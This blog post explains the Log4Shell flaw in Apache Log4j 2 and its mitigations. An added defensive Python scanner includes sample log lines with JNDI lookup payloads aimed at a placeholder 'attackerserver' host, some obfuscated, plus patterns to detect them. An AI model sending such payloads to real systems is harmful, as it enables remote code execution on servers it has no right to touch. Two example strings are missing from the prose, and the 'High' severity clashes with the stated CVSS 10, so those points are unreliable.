Log4J Vulnerability

Vishnu Shivalal P
3 min read · Sep 19, 2022

Log4J

Log4j is an open source logging framework in Java, which is distributed under the Apache Software License. This framework allows software developers to log various data within their application and it is part of the Apache Logging Services, a project of the Apache Software Foundation. Log4j is used in thousands of websites and applications, to perform functions like logging information which can be used for debugging and other purposes.

Log4j Vulnerability

The Log4j vulnerability is a critical flaw affecting Apache Log4j 2 versions 2.0 to 2.14.1. It was discovered by Chen Zhaojun of the Alibaba Cloud Security Team. NIST (National Institute of Standards and Technology) published it as a critical CVE in the National Vulnerability Database on December 10th, 2021, under the identifier CVE-2021-44228, and the Apache Software Foundation assigned it the maximum CVSS severity rating of 10.

This vulnerability allows unauthenticated Remote Code Execution (RCE). Attackers can take advantage of it by just inserting a line of code like

This vulnerability can be found in products of some of the best-known technology vendors, such as AWS, IBM, Cloudflare, Cisco, iCloud, Minecraft: Java Edition, Steam and VMware.

Log4j Vulnerability Exploitation

Log4j readily logs user input and, when a logged message contains a lookup, performs network lookups through JNDI (Java Naming and Directory Interface) to obtain objects from services such as LDAP (Lightweight Directory Access Protocol). Log4j treats the lookup inside the message as a URL, fetches the response, and can end up executing code with the full privileges of the application. The vulnerability is triggered by plain text that uses a specific syntax.

Log messages routinely contain user-controlled data, into which attackers can insert JNDI references pointing to LDAP servers they control, ready to serve malicious Java classes that perform any action they choose. When Log4j finds the following string in a log message:

it instructs JNDI to ask the LDAP server at “attackerserver” for the “exploit” object. By design, JNDI does not just return the LDAP server’s attributes: if the response is a reference to a Java class, JNDI loads and executes that class. So if the LDAP server’s response references the URL https://attackerserver/exploit, JNDI will automatically request the file “exploit” from that web server and execute what it receives. This gives the attacker remote access to the application.
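A defender-side illustration of the lookup behaviour described above, added here and not part of the original post: a small Python scanner that normalises the common ways the `${jndi:` token is disguised with nested lookups (`${lower:…}`, `${upper:…}` and the `${…:-default}` form) and then reports the protocol scheme of each hit. The log lines are constructed samples, and `attackerserver` is the placeholder host name the article uses.

```python
import re
from typing import Dict, List, Optional

# Constructed sample access-log lines (not from the article): one benign
# request and three that carry a JNDI lookup in user-controlled fields.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://attackerserver/exploit}"
10.0.0.9 - - [10/Dec/2021:14:02:20 +0000] "GET /?q=${${lower:j}ndi:${lower:ldap}://attackerserver/x} HTTP/1.1" 400 12 "-" "curl/7.68"
10.0.0.9 - - [10/Dec/2021:14:02:25 +0000] "GET / HTTP/1.1" 200 40 "${${::-j}${::-n}di:rmi://attackerserver/a}" "curl/7.68"
"""

# ${lower:X} / ${upper:X} evaluate to the case-changed literal X.
_FUNC = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${name:-default} evaluates to "default" when the lookup fails; ${::-j} is
# the degenerate form attackers use to spell a single letter.
_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# The token that matters after normalisation: ${jndi:<scheme>:...}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def normalize(text: str) -> str:
    """Resolve innermost lookups repeatedly until the string stops changing."""
    prev = None
    while prev != text:
        prev = text
        text = _FUNC.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower"
            else m.group(2).upper(), text)
        text = _DEFAULT.sub(lambda m: m.group(1), text)
    return text


def scan_line(line: str) -> Optional[Dict[str, str]]:
    """Return a finding for a line containing a JNDI lookup, else None."""
    norm = normalize(line)
    match = _JNDI.search(norm)
    if not match:
        return None
    return {"scheme": match.group(1).lower(), "normalized": norm, "raw": line}


def scan_log(text: str) -> List[Dict[str, str]]:
    """Scan every line of a log and collect the findings in order."""
    return [hit for hit in (scan_line(l) for l in text.splitlines()) if hit]
```

The normalised form is kept alongside the raw line so an analyst can see both what was received and what Log4j would have evaluated.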

Log4j Vulnerability Mitigation

Disable Log4j library

Disabling software that uses the Log4j library is an effective measure, favoring controlled downtime over adversary-caused issues. This option could cause operational impacts and limit visibility into other issues.

Disable JNDI lookups or disable remote codebases

This option, while effective, may involve developer work and could impact functionality.

Disconnect affected stacks

Solution stacks not connected to agency networks pose a dramatically lower risk from attack. Consider temporarily disconnecting the stack from agency networks.

Isolate the system

Create a “vulnerable network” VLAN and segment the solution stack from the rest of the enterprise network.

Deploy a properly configured Web Application Firewall (WAF) in front of the solution stack

Deploying a WAF is an important, but incomplete, solution. While threat actors will be able to bypass this mitigation, the reduction in alerting will allow an agency SOC to focus on a smaller set of alerts.

Apply micropatch

There are several micropatches available. They are not a part of the official update but may limit agency risk.

Details

Name: Log4j or Log4Shell

Date: 9th Dec 2021 (exposed), 24th Nov 2021 (discovered)

CVE ID: CVE-2021-44228

Severity: High

Vulnerability: Remote Code Execution (RCE)
